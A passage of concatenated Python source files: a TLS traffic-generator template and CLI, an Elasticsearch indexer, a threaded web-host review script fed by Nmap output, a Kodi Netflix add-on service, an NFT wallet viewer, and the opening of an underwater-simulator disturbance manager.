or (tls_ver == 'tls1_1' and PARAMS.tls1_1)
or (tls_ver == 'tls1_2' and PARAMS.tls1_2)
or (tls_ver == 'tls1_3' and PARAMS.tls1_3) %}
{{ "," if ns.cs_grp_count }}
{% set ns.cs_grp_count = ns.cs_grp_count+1 %}
{
"cs_grp_label" : "cs_grp_{{loop.index}}",
"enable" : 1,
"srv_ip" : "14.2{{traffic_id}}.51.{{loop.index}}",
"srv_port" : 443,
"clnt_ip_begin" : "12.2{{traffic_id}}.51.{{1+loop.index0*10}}",
"clnt_ip_end" : "12.2{{traffic_id}}.51.{{loop.index*10}}",
"clnt_port_begin" : {{PARAMS.port_begin}},
"clnt_port_end" : 65000,
"cipher" : "{{PARAMS.cipher}}",
"tls_version" : "{{tls_ver}}",
"close_type" : "fin",
"close_notify" : "no_send",
"app_rcv_buff" : {{PARAMS.app_rcv_buff}},
"app_snd_buff" : {{PARAMS.app_snd_buff}},
"write_chunk" : {{PARAMS.app_next_write}},
"tcp_rcv_buff" : {{PARAMS.tcp_rcv_buff}},
"tcp_snd_buff" : {{PARAMS.tcp_snd_buff}},
"cs_data_len" : {{PARAMS.app_cs_data_len}},
"sc_data_len" : {{PARAMS.app_sc_data_len}},
"cs_start_tls_len" : 0,
"sc_start_tls_len" : 0
}
{%- endif %}
{%- endfor %}
]
}
],
"zone_cmds" : [
"ip link set dev {{PARAMS.na_iface_container}} up",
"ifconfig {{PARAMS.na_iface_container}} hw ether {{PARAMS.client_mac_seed}}:{{'{:02x}'.format(traffic_id)}}",
"ip route add default dev {{PARAMS.na_iface_container}} table 200",
"ip -4 route add local 12.2{{traffic_id}}.51.0/24 dev lo",
"ip rule add from 12.2{{traffic_id}}.51.0/24 table 200",
"tcpdump -i {{PARAMS.na_iface_container}} {{PARAMS.tcpdump}} -w {{PARAMS.pcaps_dir_container.rstrip('/')}}/zone-{{traffic_id}}-client.pcap &"
]
}
,
{
"zone_label" : "zone-{{traffic_id}}-server",
"enable" : 1,
"iface" : "{{PARAMS.iface_container}}",
"tcpdump" : "{{PARAMS.tcpdump}}",
"app_list" : [
{
"app_type" : "tls_server",
"app_label" : "tls_server_1",
"enable" : 1,
"srv_list" : [
{% set ns.srv_count = 0 %}
{%- for tls_ver in ['sslv3', 'tls1', 'tls1_1', 'tls1_2', 'tls1_3'] %}
{%- if (tls_ver == 'sslv3' and PARAMS.sslv3)
or (tls_ver == 'tls1' and PARAMS.tls1)
or (tls_ver == 'tls1_1' and PARAMS.tls1_1)
or (tls_ver == 'tls1_2' and PARAMS.tls1_2)
or (tls_ver == 'tls1_3' and PARAMS.tls1_3) %}
{{ "," if ns.srv_count }}
{% set ns.srv_count = ns.srv_count+1 %}
{
"srv_label" : "srv_{{loop.index}}",
"enable" : 1,
"emulation_id" : 0,
"srv_ip" : "14.2{{traffic_id}}.51.{{loop.index}}",
"srv_port" : 443,
"srv_cert" : "{{PARAMS.server_cert}}",
"srv_key" : "{{PARAMS.server_key}}",
"cipher" : "{{PARAMS.cipher}}",
"tls_version" : "{{tls_ver}}",
"close_type" : "fin",
"close_notify" : "no_send",
"app_rcv_buff" : {{PARAMS.app_rcv_buff}},
"app_snd_buff" : {{PARAMS.app_snd_buff}},
"write_chunk" : {{PARAMS.app_next_write}},
"tcp_rcv_buff" : {{PARAMS.tcp_rcv_buff}},
"tcp_snd_buff" : {{PARAMS.tcp_snd_buff}},
"cs_data_len" : {{PARAMS.app_cs_data_len}},
"sc_data_len" : {{PARAMS.app_sc_data_len}},
"cs_start_tls_len" : 0,
"sc_start_tls_len" : 0
}
{%- endif %}
{%- endfor %}
]
}
],
"zone_cmds" : [
"ip link set dev {{PARAMS.nb_iface_container}} up",
"ifconfig {{PARAMS.nb_iface_container}} hw ether {{PARAMS.server_mac_seed}}:{{'{:02x}'.format(traffic_id)}}",
"ip route add default dev {{PARAMS.nb_iface_container}} table 200",
"ip -4 route add local 14.2{{traffic_id}}.51.0/24 dev lo",
"ip rule add from 14.2{{traffic_id}}.51.0/24 table 200",
"tcpdump -i {{PARAMS.nb_iface_container}} {{PARAMS.tcpdump}} -w {{PARAMS.pcaps_dir_container.rstrip('/')}}/zone-{{traffic_id}}-server.pcap &"
]
}
{{ "," if not loop.last }}
{%- endfor %}
]
}
''')
return tlspack_cfg.render(PARAMS = c_args)
def get_arguments ():
arg_parser = argparse.ArgumentParser(description = 'test commands')
subparsers = arg_parser.add_subparsers(dest='cmd_name'
,help='sub-command help')
cps_parser = subparsers.add_parser('cps', help='cps help')
add_traffic_params(cps_parser)
add_cps_params (cps_parser)
bw_parser = subparsers.add_parser('bw', help='bw help')
add_traffic_params(bw_parser)
add_bw_params (bw_parser)
mcert_parser = subparsers.add_parser('mcert', help='mcert help')
add_traffic_params(mcert_parser)
add_mcert_params (mcert_parser)
tproxy_parser = subparsers.add_parser('tproxy', help='tproxy help')
add_proxy_params (tproxy_parser)
add_tproxy_params (tproxy_parser)
stop_parser = subparsers.add_parser('stop', help='stop help')
add_stop_params (stop_parser)
c_args = arg_parser.parse_args()
return c_args
if __name__ == '__main__':
try:
c_args = get_arguments ()
except Exception as er:
print er
sys.exit(1)
if c_args.cmd_name in ['cps', 'bw', 'tproxy', 'mcert']:
try:
with open(os.path.join (c_args.host_rundir
, 'registry'
, 'pods'
, c_args.pod
, 'config.json') ) as f:
pod_info = json.load(f)
except Exception as er:
print 'invalid pod {}'.format (c_args.pod)
sys.exit(1)
c_args.pcaps_dir_container = os.path.join(c_args.target_rundir, 'traffic', c_args.runtag, 'pcaps')
if c_args.cmd_name in ['cps', 'bw', 'mcert']:
c_args.na_iface_container = filter (lambda n : n['host_iface'] == c_args.na_iface, pod_info['networks'])[0]['container_iface']
c_args.nb_iface_container = filter (lambda n : n['host_iface'] == c_args.nb_iface, pod_info['networks'])[0]['container_iface']
c_args.traffic_paths = pod_info['containers']['count'] / 2
c_args.cps = c_args.cps / c_args.traffic_paths
c_args.max_active = c_args.max_active / c_args.traffic_paths
c_args.max_pipeline = c_args.max_pipeline / c_args.traffic_paths
supported_cipher_names = map(lambda x : x['cipher_name']
, supported_ciphers)
if c_args.cmd_name == 'cipher':
selected_ciphers = map(lambda x : x.strip(), c_args.cipher.split(':'))
for ciph in selected_ciphers:
if ciph not in supported_cipher_names:
raise Exception ('unsupported cipher - ' + ciph)
elif c_args.cmd_name == 'cps':
if c_args.cipher not in supported_cipher_names:
raise Exception ('unsupported cipher - ' + c_args.cipher)
elif c_args.cmd_name in ['tproxy']:
c_args.ta_iface_container = filter (lambda n : n['host_iface'] == c_args.ta_iface, pod_info['networks'])[0]['container_iface']
c_args.tb_iface_container = filter (lambda n : n['host_iface'] == c_args.tb_iface, pod_info['networks'])[0]['container_iface']
if c_args.cmd_name == 'cps':
traffic_s = process_cps_template(c_args)
elif c_args.cmd_name == 'bw':
traffic_s = process_bw_template(c_args)
elif c_args.cmd_name == 'tproxy':
traffic_s = process_tproxy_template(c_args)
elif c_args.cmd_name == 'mcert':
traffic_s = process_mcert_template(c_args)
start_run(c_args, traffic_s)
elif c_args.cmd_name == 'stop':
try:
with open(os.path.join (c_args.host_rundir
, 'registry'
, 'runs'
, c_args.runtag
, 'config.json') ) as f:
runs_info = json.load(f)
except Exception as er:
print 'invalid runtag {}'.format(c_args.runtag)
sys.exit(1)
c_args.pod = runs_info['pod']
try:
with open(os.path.join (c_args.host_rundir
, 'registry'
, 'pods'
, c_args.pod
, 'config.json') ) as f:
pod_info = json.load(f)
except Exception as er:
print 'invalid pod {}'.format (c_args.pod)
sys.exit(1)
stop_run (pod_info, c_args)
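# Example invocations (illustrative only; the script name, pod, runtag and
# interface names are hypothetical and must match the pod registry created
# elsewhere under <host_rundir>/registry/pods/<pod>/config.json):
#
#   python tlspack_run.py cps --pod pod-1 --runtag run-1 --na ens1 --nb ens2 \
#       --cps 100 --cipher AES128-GCM-SHA256 --tls1_2
#   python tlspack_run.py stop --runtag run-1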
|
crawler_document_indexer.py
|
from models import CrawlerDocument
from mongoengine import connect
from threading import Thread, Lock
from elasticsearchcli import ElasticSearchCli
import logging
from mongoengine import register_connection
logging.basicConfig(level = logging.DEBUG)
'''
Class is responsible for managing the index
'''
class IndexController(object):
def __init__(self):
# register connection to the databases when the server starts
register_connection('fillmyfridge', 'fillmyfridge')
self.index_name = 'tinmart'
self.elasticsearchcli = ElasticSearchCli(self.index_name)
def __create_lucene_dict(self, crawler_document):
return {
'docId': crawler_document.docId,
'title': crawler_document.title,
'category': crawler_document.category,
'price': crawler_document.price,
}
def __add_document(self, crawler_document):
lucene_document = self.__create_lucene_dict(crawler_document)
docId = str(lucene_document['docId'])
status = self.elasticsearchcli.index_document('products', docId, lucene_document)
if status:
logging.debug('Document: {} indexed...'.format(docId))
'''
Indexes all the documents in mongodb in a multithreaded fashion
'''
def index_crawled_documents(self):
crawler_documents = CrawlerDocument.objects
for crawler_document in crawler_documents:
# create the thread passing in the method which indexes lucene
thread = Thread(target = self.__add_document, args = (crawler_document, ))
thread.start()
'''
Deletes an index from the database
'''
def delete_index(self):
        status = self.elasticsearchcli.delete_index()
        if status:
            logging.debug('Index {} removed...'.format(self.index_name))
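'''
Illustrative usage sketch (not part of the original module): assumes a reachable
MongoDB registered as 'fillmyfridge' and an Elasticsearch instance behind
ElasticSearchCli, so run it only where both services exist.
'''
if __name__ == '__main__':
    IndexController().index_crawled_documents()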
|
http_Review.py
|
#!/usr/bin/python3
from modules import *
import argparse
import sys
import threading
def reportrun(web_hosts):
reportFolder = reportOUTPUT.makereportFolder()
makereportSTART.makereportstart(reportFolder)
threads = []
for host in web_hosts:
t = threading.Thread(target=webRequest.webcheck, args=(host, reportFolder), daemon=True)
threads.append(t)
t.start()
    for t in threads:
        t.join()
makereportEND.makereportend(reportFolder)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("-f", "--file", help="Provide a text file or files with a list of IPs", nargs="+")
parser.add_argument("-g", "--gnmap", help="Provide a Nmap gnmap file or files to parse", nargs="+")
parser.add_argument("-x", "--xml", help="Provide a Nmap XML file or files to parse", nargs="+")
args = parser.parse_args()
if len(sys.argv) == 1:
parser.print_help()
sys.exit()
if args.xml:
web_hosts = parseXML.parsexml(args.xml)
elif args.gnmap:
web_hosts = parseGNMAP.parsegnmap(args.gnmap)
elif args.file:
web_hosts = parseFILE.parsefile(args.file)
reportrun(web_hosts)
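# Example invocations (illustrative; the input file names are hypothetical):
#   ./http_Review.py -x nmap_scan.xml
#   ./http_Review.py -g nmap_scan.gnmap
#   ./http_Review.py -f live_hosts.txt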
|
service.py
|
# -*- coding: utf-8 -*-
# Author: asciidisco
# Module: service
# Created on: 13.01.2017
# License: MIT https://goo.gl/5bMj3H
"""Kodi plugin for Netflix (https://netflix.com)"""
# pylint: disable=import-error
import threading
import socket
import sys
from datetime import datetime, timedelta
import xbmc
from resources.lib.NetflixCommon import NetflixCommon
from resources.lib.MSLHttpRequestHandler import MSLTCPServer
from resources.lib.NetflixHttpRequestHandler import NetflixTCPServer
from resources.lib.playback import PlaybackController
from resources.lib.playback.bookmarks import BookmarkManager
from resources.lib.playback.stream_continuity import StreamContinuityManager
from resources.lib.playback.section_skipping import SectionSkipper
def select_unused_port():
"""
Helper function to select an unused port on the host machine
:return: int - Free port
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('127.0.0.1', 0))
_, port = sock.getsockname()
sock.close()
return port
# Setup plugin
BASE_URL = sys.argv[0]
PLUGIN_HANDLE = None
def strp(value, form):
"""
Helper function to safely create datetime objects from strings
:return: datetime - parsed datetime object
"""
# pylint: disable=broad-except
from time import strptime
def_value = datetime.utcfromtimestamp(0)
try:
return datetime.strptime(value, form)
except TypeError:
try:
return datetime(*(strptime(value, form)[0:6]))
except ValueError:
return def_value
except Exception:
return def_value
class NetflixService(object):
"""
Netflix addon service
"""
def __init__(self):
# init kodi helper (for logging)
self.nx_common = NetflixCommon(plugin_handle=PLUGIN_HANDLE,
base_url=BASE_URL)
self.last_schedule_check = datetime.now()
self.schedule_check_interval = int(self.nx_common.get_setting(
'schedule_check_interval'))
self.startidle = 0
self.freq = int('0' + self.nx_common.get_setting('auto_update'))
# pick & store a port for the MSL service
msl_port = select_unused_port()
self.nx_common.set_setting('msl_service_port', str(msl_port))
self.nx_common.log(msg='[MSL] Picked Port: ' + str(msl_port))
# pick & store a port for the internal Netflix HTTP proxy service
ns_port = select_unused_port()
self.nx_common.set_setting('netflix_service_port', str(ns_port))
self.nx_common.log(msg='[NS] Picked Port: ' + str(ns_port))
self.nx_common.flush_settings()
# server defaults
MSLTCPServer.allow_reuse_address = True
NetflixTCPServer.allow_reuse_address = True
# configure the MSL Server
self.msl_server = MSLTCPServer(('127.0.0.1', msl_port),
self.nx_common)
# configure the Netflix Data Server
self.ns_server = NetflixTCPServer(('127.0.0.1', ns_port),
self.nx_common)
self.msl_thread = threading.Thread(
target=self.msl_server.serve_forever)
self.ns_thread = threading.Thread(
target=self.ns_server.serve_forever)
def _start_servers(self):
self.msl_server.server_activate()
self.msl_server.timeout = 1
        # start thread for MSL service
self.msl_thread.start()
self.nx_common.log(msg='[MSL] Thread started')
self.ns_server.server_activate()
self.ns_server.timeout = 1
# start thread for Netflix HTTP service
self.ns_thread.start()
self.nx_common.log(msg='[NS] Thread started')
def _shutdown(self):
# MSL service shutdown sequence
self.msl_server.server_close()
self.msl_server.shutdown()
self.msl_thread.join()
self.msl_server = None
self.msl_thread = None
self.nx_common.log(msg='Stopped MSL Service')
# Netflix service shutdown sequence
self.ns_server.server_close()
self.ns_server.shutdown()
self.ns_thread.join()
self.ns_server = None
self.ns_thread = None
self.nx_common.log(msg='Stopped HTTP Service')
def _is_idle(self):
if self.nx_common.get_setting('wait_idle') != 'true':
return True
lastidle = xbmc.getGlobalIdleTime()
if xbmc.Player().isPlaying():
self.startidle = lastidle
if lastidle < self.startidle:
self.startidle = 0
idletime = lastidle - self.startidle
return idletime >= 300
def _update_running(self):
update = self.nx_common.get_setting('update_running') or 'false'
if update != 'false':
starttime = strp(update, '%Y-%m-%d %H:%M')
if (starttime + timedelta(hours=6)) <= datetime.now():
self.nx_common.set_setting('update_running', 'false')
self.nx_common.log(
'Canceling previous library update - duration > 6 hours',
xbmc.LOGWARNING)
else:
self.nx_common.log('DB Update already running')
return True
return False
def run(self):
"""
Main loop. Runs until xbmc.Monitor requests abort
"""
self._start_servers()
controller = PlaybackController(self.nx_common)
controller.action_managers = [
BookmarkManager(self.nx_common),
SectionSkipper(self.nx_common),
StreamContinuityManager(self.nx_common)
]
player = xbmc.Player()
while not controller.abortRequested():
if self.ns_server.esn_changed():
self.msl_server.reset_msl_data()
try:
if player.isPlayingVideo():
controller.on_playback_tick()
if self.library_update_scheduled() and self._is_idle():
self.update_library()
except RuntimeError as exc:
self.nx_common.log(
'RuntimeError in main loop: {}'.format(exc), xbmc.LOGERROR)
if controller.waitForAbort(1):
break
self._shutdown()
def library_update_scheduled(self):
"""
Checks if the scheduled time for a library update has been reached
"""
now = datetime.now()
next_schedule_check = (
self.last_schedule_check +
timedelta(minutes=self.schedule_check_interval))
if not self.freq or now <= next_schedule_check:
'''
self.nx_common.log('Auto-update disabled or schedule check '
'interval not complete yet ({} / {}).'
.format(now, next_schedule_check))
'''
return False
self.last_schedule_check = now
time = self.nx_common.get_setting('update_time') or '00:00'
lastrun_date = (self.nx_common.get_setting('last_update') or
'1970-01-01')
lastrun_full = lastrun_date + ' ' + time[0:5]
lastrun = strp(lastrun_full, '%Y-%m-%d %H:%M')
freqdays = [0, 1, 2, 5, 7][self.freq]
nextrun = lastrun + timedelta(days=freqdays)
self.nx_common.log(
'It\'s currently {}, next run is scheduled for {}'
.format(now, nextrun))
return now >= nextrun
def update_library(self):
"""
Triggers an update of the local Kodi library
"""
if not self._update_running():
self.nx_common.log('Triggering library update', xbmc.LOGNOTICE)
xbmc.executebuiltin(
('XBMC.RunPlugin(plugin://{}/?action=export-new-episodes'
'&inbackground=True)')
.format(self.nx_common.get_addon().getAddonInfo('id')))
if __name__ == '__main__':
NetflixService().run()
|
wallet.py
|
from alert import alert
from appwindow import AppWindow
from cache import Cache
from cachemanager import CacheManager
from cards import Cards
from config import BaseConfig, LocalConfig
from datetime import datetime
from downloader import Downloader
from enum import Enum
from ethereum import Ethereum
from opensea import OpenSea
from os import stat
from pushcontainer import push_container
from singleton import Singleton
from sortdirection import SortDirection
from threading import Lock, Thread, Event
from time import sleep
import dearpygui.dearpygui as dpg
import webbrowser
class DataColumns(Enum):
TokenId = 1
Quantity = 2
ETH = 3
USD = 4
Name = 5
Link = 6
ImageUrl = 7
ThumbnailUrl = 8
Properties = 9
TotalSupply = 10
WithheldSupply = 11
UnreleasedPercentage = 12
class Wallet(metaclass=Singleton):
MenuBar = dpg.generate_uuid()
ProgressBar = dpg.generate_uuid()
TableData = []
TableDataLock = Lock()
AssetsTableLock = Lock()
TableSortPreference = (DataColumns.ETH.name, SortDirection.Descending())
def __init__(self, width, height, mainWindow:AppWindow, baseConfig:BaseConfig, localConfig:LocalConfig, logInfoCallback, logErrorCallback):
# options
self.mainWindow = mainWindow
self.baseConfig = baseConfig
self.localConfig = localConfig
self.logInfoCallback = logInfoCallback
self.logErrorCallback = logErrorCallback
# data
self.lastUpdateTime = 0
self.dataUpdated = Event()
# UI elements
self.addressText = dpg.generate_uuid()
self.ethPriceText = dpg.generate_uuid()
self.lastUpdateText = dpg.generate_uuid()
self.table = dpg.generate_uuid()
self.totalETHText = dpg.generate_uuid()
self.totalUSDText = dpg.generate_uuid()
self.window = dpg.generate_uuid()
# dependencies
self.cache = CacheManager(baseConfig, localConfig)
self.cards = Cards(
logInfoCallback=logInfoCallback,
logErrorCallback=logErrorCallback)
self.downloader = Downloader(
baseConfig=baseConfig,
localConfig=localConfig,
logInfoCallback=logInfoCallback,
logErrorCallback=logErrorCallback)
with dpg.window(
id=self.window,
label="Wallet",
width=width,
height=height,
show=True):
dpg.add_menu_bar(id=Wallet.MenuBar, parent=self.window)
dpg.add_progress_bar(parent=Wallet.MenuBar, id=Wallet.ProgressBar, label="ProgressBar", overlay="status", default_value = 0.0)
dpg.add_input_text(
id=self.addressText,
label="Wallet Address",
default_value=localConfig.Get('WalletAddress'),
width=400)
watt = dpg.add_tooltip(parent=self.addressText)
dpg.add_text(default_value="Put the address of a wallet you want to view here and click 'Refresh'", parent=watt)
dpg.add_same_line(spacing=2)
dpg.add_button(label="Refresh", callback=self.Update)
dpg.add_text("Asset Value (ETH):")
dpg.add_same_line(spacing=4)
dpg.add_text(id=self.totalETHText)
dpg.add_same_line(spacing=10)
dpg.add_text("Ethereum Value (USD/ETH):")
dpg.add_same_line(spacing=4)
dpg.add_text(id=self.ethPriceText)
dpg.add_same_line(spacing=10)
dpg.add_text("Asset Value (USD):")
dpg.add_same_line(spacing=4)
dpg.add_text(id=self.totalUSDText)
dpg.add_same_line(spacing=10)
dpg.add_text("Last Refresh:")
dpg.add_same_line(spacing=4)
dpg.add_text(id=self.lastUpdateText)
self.InitTable()
# kick things off with a refresh
#self.cancelUpdate = SetInterval(60*10, self.Update)
def InitTable(self):
t = dpg.add_table(
id=self.table,
parent=self.window,
header_row=True,
sortable=True,
reorderable=True,
resizable=True,
no_host_extendX=True,
policy=dpg.mvTable_SizingStretchProp,
callback=self.SortHandler
)
with push_container(t) as table:
dpg.add_table_column(label=DataColumns.Quantity.name, default_sort=True, prefer_sort_descending=True)
dpg.add_table_column(label=DataColumns.TotalSupply.name, default_sort=True, prefer_sort_descending=True)
dpg.add_table_column(label=DataColumns.WithheldSupply.name, default_sort=True, prefer_sort_descending=True)
dpg.add_table_column(label=DataColumns.UnreleasedPercentage.name, default_sort=True, prefer_sort_descending=True)
dpg.add_table_column(label=DataColumns.ETH.name, default_sort=True, prefer_sort_descending=True)
dpg.add_table_column(label=DataColumns.USD.name, default_sort=True, prefer_sort_descending=True)
dpg.add_table_column(label=DataColumns.Name.name, default_sort=True, prefer_sort_ascending=True)
dpg.add_table_column(label=DataColumns.Properties.name, no_sort=True)
return table
def Update(self):
try:
# read the wallet address provided by the user
walletAddress = Ethereum.w3.toChecksumAddress(dpg.get_value(self.addressText))
self.localConfig.Set('WalletAddress', walletAddress)
self.localConfig.Save()
contractAddress = Ethereum.w3.toChecksumAddress(self.baseConfig.Get('ContractAddress'))
except ValueError:
alert("Wallet Address Error", f"The address you provided wasn't in the right format.\n\nIt should look like:\n\n{self.baseConfig.Get('DonationAddress')}")
return
except Exception as e:
alert("Wallet Address Error", f"Something went wrong: {str(e)}")
return
self.dataUpdated.clear()
Thread(target=self.UpdateTableData, args=(walletAddress, contractAddress), daemon=True).start()
Thread(target=self.UpdateAssetsTable, daemon=True).start()
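    @staticmethod
    def _event_handshake_sketch():
        # Minimal sketch (illustrative, never called) of the handshake used by
        # Update() above: UpdateTableData()/SortTableData() produce the rows
        # and set dataUpdated, while UpdateAssetsTable() blocks on wait() so
        # the UI is only rebuilt once fresh data exists. The names below are
        # hypothetical and not used elsewhere in this module.
        ready = Event()
        results = []

        def producer():
            results.append('row')   # stand-in for UpdateTableData()
            ready.set()             # stand-in for SortTableData() signalling

        def consumer():
            ready.wait()            # stand-in for UpdateAssetsTable() waiting
            return list(results)

        Thread(target=producer, daemon=True).start()
        return consumer()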
def Show(self):
dpg.configure_item(self.window, show=True)
def HoverHandler(self, sender, app_data, user_data):
fileName = user_data['FileName']
# the current image displayed is the same as the image we're trying to display
if dpg.does_item_exist(self.mainWindow.CardWindowImage):
if dpg.get_item_user_data(self.mainWindow.CardWindowImage) == fileName:
return
# the texture is already loaded, so just switch to it
if self.cache.IsCached(Cache.Textures, fileName):
dpg.set_item_user_data(self.mainWindow.CardWindowImage, fileName)
w, h, data = self.cache.textures[fileName]
dpg.set_value(self.mainWindow.CardWindowImageTexture, data)
return
# the texture isn't in the file cache
if not self.cache.IsCached(Cache.Images, fileName):
self.downloader.Enqueue(url=user_data['URL'], fileName=fileName)
# the texture is in the file cache, so load it
if self.cache.IsCached(Cache.Images, fileName):
# load the texture
fullName = self.cache.GetCachePath(Cache.Images, fileName)
self.logInfoCallback(f"Loading {fileName}")
loadedImage = dpg.load_image(fullName)
if loadedImage:
self.logInfoCallback(f"Loaded {fileName}. Installing texture...")
w, h, _, data = loadedImage
# cache it
self.cache.textures[fileName] = (w, h, data)
# set it
with dpg.texture_registry():
if dpg.does_item_exist(self.mainWindow.CardWindowImageTexture):
dpg.set_value(self.mainWindow.CardWindowImageTexture, data)
dpg.set_value(self.mainWindow.CardWindowImage, fileName)
else:
dpg.add_dynamic_texture(id=self.mainWindow.CardWindowImageTexture, width=w, height=h, default_value=data)
dpg.add_image(texture_id=self.mainWindow.CardWindowImageTexture, id=self.mainWindow.CardWindowImage, parent=self.mainWindow.CardWindow, user_data=fileName, width=w / 2 + 20, height=h / 2 + 50)
else:
self.logErrorCallback(f"Couldn't load {fileName}.")
                if stat(fullName).st_size == 0:
self.logErrorCallback(f"{fileName} is 0 bytes long. Consider deleting it.")
def SortHandler(self, sender, app_data, user_data):
column, direction = app_data[0]
columnName = dpg.get_item_configuration(column)['label']
self.dataUpdated.clear()
self.SortTableData(columnName, direction != 1)
self.UpdateAssetsTable()
def UpdateAssetsTable(self):
# wait for the update signal
self.dataUpdated.wait()
with Wallet.AssetsTableLock:
walletAddress = self.localConfig.Get('WalletAddress')
contractAddress = self.baseConfig.Get('ContractAddress')
if not Wallet.TableData:
self.UpdateTableData(walletAddress, contractAddress)
with Wallet.TableDataLock:
if dpg.does_item_exist(self.table):
dpg.delete_item(self.table)
self.InitTable()
for row in Wallet.TableData:
tokenId = row[DataColumns.TokenId.name]
imageFileName = f"{contractAddress}.{tokenId}.f.png"
thumbFileName = f"{contractAddress}.{tokenId}.t.png"
record = [
row[DataColumns.Quantity.name],
row[DataColumns.TotalSupply.name],
row[DataColumns.WithheldSupply.name],
"{0:.2f}%".format(row[DataColumns.UnreleasedPercentage.name]),
"ETH {0:,.4f}".format(row[DataColumns.ETH.name]),
"${0:,.2f}".format(row[DataColumns.USD.name]),
]
hoverData = {
"URL": row[DataColumns.ImageUrl.name],
"FileName": imageFileName,
"ThumbName": thumbFileName,
"Name": row[DataColumns.Name.name],
"TokenId": row[DataColumns.TokenId.name]
}
for t in record:
txt = dpg.add_text(default_value=t, parent=self.table)
hoverData['EventSource'] = txt
dpg.add_hover_handler(parent=txt, callback=self.HoverHandler, user_data=hoverData)
dpg.add_table_next_column(parent=self.table)
btn = dpg.add_button(
label=row[DataColumns.Name.name],
parent=self.table,
user_data=row[DataColumns.Link.name],
callback=lambda _,__,url=row[DataColumns.Link.name]: webbrowser.open(url)
)
tt = dpg.add_tooltip(parent=btn)
dpg.add_text(f"TokenID: {tokenId}", parent=tt)
dpg.add_text("\n".join(row[DataColumns.Properties.name].values()), parent=tt)
hoverData['EventSource'] = btn
dpg.add_hover_handler(parent=btn, callback=self.HoverHandler, user_data=hoverData)
dpg.add_table_next_column(parent=self.table)
dpg.add_text(", ".join(row[DataColumns.Properties.name].values()), parent=self.table)
dpg.add_table_next_column(parent=self.table)
def SortTableData(self, column, descending):
with Wallet.TableDataLock:
self.dataUpdated.clear()
Wallet.TableSortPreference = (column, descending)
Wallet.TableData = sorted(Wallet.TableData, key=lambda r: r[column], reverse=descending)
self.dataUpdated.set()
def UpdateTableData(self, walletAddress, contractAddress):
ethPrice = Ethereum.GetEthInFiat(1.0)
netWorthInEth = 0.0
netWorthInFiat = 0.0
i = 0.0
with Wallet.TableDataLock:
self.dataUpdated.clear()
Wallet.TableData.clear()
assets = OpenSea.GetAssets(
walletAddress,
contractAddress,
logInfoCallback=self.logInfoCallback,
logErrorCallback=self.logErrorCallback)
numAssets = float(len(assets))
for asset in assets:
i += 1.0
name = asset['name']
link = asset['permalink']
tokenId = int(asset['token_id'])
imageUrl = asset['image_original_url']
thumbUrl = asset['image_thumbnail_url']
properties = {t['trait_type']:t['value'] for t in asset['traits']}
supply = OpenSea.GetTotalTokenSupply(
baseConfig=self.baseConfig,
cards=self.cards,
tokenId=tokenId,
logInfoCallback=self.logInfoCallback,
logErrorCallback=self.logErrorCallback)
ownedQuantity = Ethereum.GetTokenQuantity(walletAddress, contractAddress, tokenId)
price = OpenSea.GetLastSalePrice(asset)
netWorthInEth += price * ownedQuantity
netWorthInFiat += price * ownedQuantity * ethPrice
usdPrice = price * ethPrice
row = {
DataColumns.TokenId.name : tokenId,
DataColumns.Quantity.name : ownedQuantity,
DataColumns.ETH.name :price,
DataColumns.USD.name : usdPrice,
DataColumns.Name.name : name,
DataColumns.Link.name : link,
DataColumns.ImageUrl.name : imageUrl,
DataColumns.ThumbnailUrl.name : thumbUrl,
DataColumns.Properties.name : properties,
DataColumns.TotalSupply.name : supply['Minted'],
DataColumns.WithheldSupply.name : supply['Withheld'],
DataColumns.UnreleasedPercentage.name : supply['Withheld'] / supply['Minted'] * 100
}
Wallet.TableData.append(row)
try:
percentage = i / numAssets
dpg.set_value(Wallet.ProgressBar, percentage)
                    dpg.configure_item(Wallet.ProgressBar, overlay="Loaded {0:,} of {1:,} assets.".format(int(i), int(numAssets)))
except Exception as e:
self.logErrorCallback(str(e))
dpg.set_value(self.ethPriceText, "${0:,.2f}".format(ethPrice))
dpg.set_value(self.totalETHText, "{0:,.4f}".format(netWorthInEth))
dpg.set_value(self.totalUSDText, "${0:,.2f}".format(netWorthInFiat))
dpg.set_value(self.lastUpdateText, datetime.now().strftime("%c"))
column, descending = Wallet.TableSortPreference
        # no need to set the self.dataUpdated event here because SortTableData sets it
self.SortTableData(column, descending)
|
disturbance_manager.py
|
#!/usr/bin/env python3
# Copyright (c) 2020 The Plankton Authors.
# All rights reserved.
#
# This source code is derived from UUV Simulator
# (https://github.com/uuvsimulator/uuv_simulator)
# Copyright (c) 2016-2019 The UUV Simulator Authors
# licensed under the Apache license, Version 2.0
# cf. 3rd-party-licenses.txt file in the root directory of this source tree.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import numpy as np
import sys
import threading
import time
import rclpy
from uuv_world_ros_plugins_msgs.srv import *
from gazebo_msgs.srv import ApplyLinkWrench
from uuv_gazebo_ros_plugins_msgs.srv import SetThrusterState, SetThrusterEfficiency
from geometry_msgs.msg import Point, WrenchStamped, Vector3
from rclpy.node import Node
from plankton_utils.param_helper import parse_nested_params_to_dict
from plankton_utils.time import time_in_float_sec, float_sec_to_int_sec_nano
from plankton_utils.time import is_sim_time
# TODO Probably rewrite
class DisturbanceManager(Node):
def __init__(self, node_name, **kwargs):
super().__init__(node_name,
allow_undeclared_parameters=True,
automatically_declare_parameters_from_overrides=True,
**kwargs)
# sim_time = rclpy.parameter.Parameter('use_sim_time', rclpy.Parameter.Type.BOOL, True)
# self.set_parameters([sim_time])
self._logger = logging.getLogger('dp_local_planner')
out_hdlr = logging.StreamHandler(sys.stdout)
out_hdlr.setFormatter(logging.Formatter('%(asctime)s | %(levelname)s | %(module)s | %(message)s'))
out_hdlr.setLevel(logging.INFO)
self._logger.addHandler(out_hdlr)
self._logger.setLevel(logging.INFO)
self.thread = threading.Thread(target=rclpy.spin, args=(self,), daemon=True)
self.thread.start()
# Load disturbances and check for missing information
specs = dict(current=['starting_time', 'velocity', 'horizontal_angle',
'vertical_angle'],
wrench=['starting_time', 'duration', 'force', 'torque'],
thruster_state=['starting_time', 'thruster_id', 'is_on',
'duration'],
